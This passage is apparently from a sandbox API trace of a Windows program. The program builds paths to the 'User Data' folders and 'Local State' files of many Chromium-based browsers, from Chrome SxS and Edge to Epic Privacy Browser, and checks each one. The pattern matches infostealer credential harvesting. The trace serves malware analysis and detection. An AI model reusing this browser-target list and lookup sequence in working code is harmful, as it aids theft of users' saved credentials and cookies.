cAlternateFileName="")) returned 0xffffffff [0234.525] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.525] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.525] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.525] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.526] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.526] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.526] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.526] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.526] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.526] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.526] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.526] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.530] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19868c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0234.530] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Chromium\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data" [0234.530] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data" [0234.530] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\Local State" [0234.530] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\chromium\\user data\\local state")) returned 0xffffffff [0234.530] wsprintfA (in: param_1=0x198450, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*") returned 56 [0234.530] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*", lpFindFileData=0x198308 | out: lpFindFileData=0x198308*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.532] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19868c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0234.533] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Microsoft\\Edge\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data" [0234.533] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data" [0234.533] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\Local State" [0234.533] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\edge\\user data\\local state")) returned 0xffffffff [0234.533] wsprintfA (in: param_1=0x198450, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*") returned 62 [0234.533] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*", lpFindFileData=0x198308 | out: lpFindFileData=0x198308*(dwFileAttributes=0x610044, ftCreationTime.dwLowDateTime=0x610074, ftCreationTime.dwHighDateTime=0x4c005c, ftLastAccessTime.dwLowDateTime=0x63006f, ftLastAccessTime.dwHighDateTime=0x6c0061, ftLastWriteTime.dwLowDateTime=0x530020, ftLastWriteTime.dwHighDateTime=0x610074, nFileSizeHigh=0x650074, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="n\x01")) returned 0xffffffff [0234.536] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19868c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0234.536] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Kometa\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data" [0234.536] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data" [0234.536] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\Local State" [0234.536] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\kometa\\user data\\local state")) returned 0xffffffff [0234.536] wsprintfA (in: param_1=0x198450, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*") returned 54 [0234.536] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*", lpFindFileData=0x198308 | out: lpFindFileData=0x198308*(dwFileAttributes=0x6c0061, ftCreationTime.dwLowDateTime=0x530020, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x650074, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.538] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19868c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0234.539] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Amigo\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data" [0234.539] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data" [0234.539] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\Local State" [0234.539] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\amigo\\user data\\local state")) returned 0xffffffff [0234.539] wsprintfA (in: param_1=0x198450, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*") returned 53 [0234.539] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*", lpFindFileData=0x198308 | out: lpFindFileData=0x198308*(dwFileAttributes=0x20006c, ftCreationTime.dwLowDateTime=0x740053, ftCreationTime.dwHighDateTime=0x740061, ftLastAccessTime.dwLowDateTime=0x65, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.541] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19868c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0234.541] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Torch\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data" [0234.541] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data" [0234.541] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\Local State" [0234.541] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\torch\\user data\\local state")) returned 0xffffffff [0234.542] wsprintfA (in: param_1=0x198450, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*") returned 53 [0234.542] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*", lpFindFileData=0x198308 | out: lpFindFileData=0x198308*(dwFileAttributes=0x20006c, ftCreationTime.dwLowDateTime=0x740053, ftCreationTime.dwHighDateTime=0x740061, ftLastAccessTime.dwLowDateTime=0x65, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.543] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19868c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0234.544] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Orbitum\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data" [0234.544] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data" [0234.544] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\Local State" [0234.544] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\orbitum\\user data\\local state")) returned 0xffffffff [0234.544] wsprintfA (in: param_1=0x198450, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\*") returned 55 [0234.544] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\*", lpFindFileData=0x198308 | out: lpFindFileData=0x198308*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.546] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19868c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0234.546] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Comodo\\Dragon\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data" [0234.546] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data" [0234.546] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\Local State" [0234.547] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\comodo\\dragon\\user data\\local state")) returned 0xffffffff [0234.547] wsprintfA (in: param_1=0x198450, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\*") returned 61 [0234.547] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\*", lpFindFileData=0x198308 | out: lpFindFileData=0x198308*(dwFileAttributes=0x740061, ftCreationTime.dwLowDateTime=0x5c0061, ftCreationTime.dwHighDateTime=0x6f004c, ftLastAccessTime.dwLowDateTime=0x610063, ftLastAccessTime.dwHighDateTime=0x20006c, ftLastWriteTime.dwLowDateTime=0x740053, ftLastWriteTime.dwHighDateTime=0x740061, nFileSizeHigh=0x65, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="n\x01")) returned 0xffffffff [0234.549] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19868c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0234.549] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Nichrome\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data" [0234.549] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data" [0234.549] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\Local State" [0234.549] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\nichrome\\user data\\local state")) returned 0xffffffff [0234.549] wsprintfA (in: param_1=0x198450, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\*") returned 56 [0234.550] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\*", lpFindFileData=0x198308 | out: lpFindFileData=0x198308*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.551] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19868c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0234.552] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Maxthon5\\Users" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users" [0234.552] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users" [0234.552] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users\\Local State" [0234.552] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\maxthon5\\users\\local state")) returned 0xffffffff [0234.552] wsprintfA (in: param_1=0x198450, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users\\*") returned 52 [0234.552] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users\\*", lpFindFileData=0x198308 | out: lpFindFileData=0x198308*(dwFileAttributes=0x530020, ftCreationTime.dwLowDateTime=0x610074, ftCreationTime.dwHighDateTime=0x650074, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.554] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19868c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0234.554] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Sputnik\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data" [0234.554] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data" [0234.554] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data\\Local State" [0234.554] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\sputnik\\user data\\local state")) returned 0xffffffff [0234.554] wsprintfA (in: param_1=0x198450, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data\\*") returned 55 [0234.554] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data\\*", lpFindFileData=0x198308 | out: lpFindFileData=0x198308*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.556] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19868c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0234.557] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Epic Privacy Browser\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data" [0234.557] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data" [0234.557] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\Local State" [0234.557] GetFileAttributesA 